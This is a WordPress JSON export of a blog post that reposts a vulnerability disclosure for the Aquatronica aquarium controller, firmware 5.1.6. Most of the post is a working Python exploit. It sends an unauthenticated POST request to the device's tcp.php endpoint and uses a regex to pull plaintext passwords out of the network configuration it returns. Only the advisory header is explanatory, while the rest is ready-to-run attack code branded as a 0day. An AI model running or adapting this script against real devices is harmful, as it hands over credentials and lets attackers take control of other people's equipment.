{"id":57152,"date":"2024-05-30T15:11:21","date_gmt":"2024-05-30T11:11:21","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178871\/ZSL-2024-5824.txt"},"modified":"2024-05-30T15:11:21","modified_gmt":"2024-05-30T11:11:21","slug":"aquatronica-control-system-5-1-6-password-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aquatronica-control-system-5-1-6-password-disclosure\/","title":{"rendered":"Aquatronica Control System 5.1.6 Password Disclosure"},"content":{"rendered":"<p>#!\/usr\/bin\/env python<br \/># -*- coding: utf-8 -*-<br \/>#<br \/>#<br \/># Aquatronica Control System 5.1.6 Passwords Leak Vulnerability<br \/>#<br \/>#<br \/># Vendor: Aquatronica s.r.l.<br \/># Product web page: https:\/\/www.aquatronica.com<br \/># Affected version: Firmware: 5.1.6<br \/># Web: 2.0<br \/>#<br \/># Summary: Aquatronica&#8217;s electronic AQUARIUM CONTROLLER is easy<br \/># to use, allowing you to control all the electrical devices in<br \/># an aquarium and to monitor all their parameters; it can be used<br \/># for soft water aquariums, salt water aquariums or both simultaneously.<br \/>#<br \/># Desc: The tcp.php endpoint on the Aquatronica controller is exposed<br \/># to unauthenticated attackers over the network. This vulnerability<br \/># allows remote attackers to send a POST request which can reveal<br \/># sensitive configuration information, including plaintext passwords.<br \/># This can lead to unauthorized access and control over the aquarium<br \/># controller, compromising its security and potentially allowing attackers<br \/># to manipulate its settings.<br \/>#<br \/># Tested on: Apache\/2.0.54 (Unix)<br \/># PHP\/5.4.17<br \/>#<br \/>#<br \/># Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/># @zeroscience<br \/>#<br \/>#<br \/># Advisory ID: ZSL-2024-5824<br \/># Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5824.php<br \/>#<br \/>#<br \/># 04.05.2024<br \/>#<\/p>\n<p>import requests, html, re, sys, time<br \/>from urllib.parse import unquote<\/p>\n<p>program = &#8220;TCP&#8221;<br \/>command = &#8220;ws_get_network_cfg&#8221;<br \/>function_id = &#8220;TCP_XML_REQUEST&#8221;<\/p>\n<p>print(&#8220;&#8221;&#8221;<br \/>_________ . .<br \/>(.. \\_ , |\\ \/|<br \/>\\ O \\ \/| \\ \\\/ \/<br \/>\\______ \\\/ | \\ \/ <br \/>vvvv\\ \\ | \/ |<br \/>\\^^^^ == \\_\/ |<br \/>`\\_ === \\. |<br \/>\/ \/\\_ \\ \/ |<br \/>|\/ \\_ \\| \/<br \/>___ ______________\\________\/________aquatronica_0day___<br \/>| |<br \/>| |<br \/>| |<br \/>&#8220;&#8221;&#8221;)<\/p>\n<p>if len(sys.argv) != 2:<br \/>print(&#8220;Usage: python aqua.py &lt;ip:port&gt;&#8221;)<br \/>sys.exit(1)<\/p>\n<p>ip = sys.argv[1]<br \/>url = f&#8221;http:\/\/{ip}\/{program.lower()}.php&#8221;<\/p>\n<p>post_data = {&#8216;function_id&#8217; : function_id.lower(),<br \/>&#8216;command&#8217; : command.upper()}<\/p>\n<p>r = requests.post(url, data=post_data)<\/p>\n<p>if r.status_code == 200:<br \/>r_d = unquote(r.text)<br \/>f_d_r = html.unescape(r_d)<br \/>regex = r&#8217;pwd=&#8221;([^&#8221;]+)&#8221;&#8216;<br \/>rain = re.findall(regex, f_d_r)<\/p>\n<p>for drops in rain:<br \/>print(&#8216; &#8216;,drops)<br \/>time.sleep(0.5)<br \/>else:<br \/>print(f&#8221;Dry season! {r.status_code}&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>#!\/usr\/bin\/env python# -*- coding: utf-8 -*-### Aquatronica Control System 5.1.6 Passwords Leak Vulnerability### Vendor: Aquatronica s.r.l.# Product web page: https:\/\/www.aquatronica.com# Affected version: Firmware: 5.1.6# Web: 2.0## Summary: Aquatronica&#8217;s electronic AQUARIUM CONTROLLER is easy# to use, allowing you to control all the electrical devices in# an aquarium and to monitor all their parameters; it can be &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57152","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57152"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57152\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}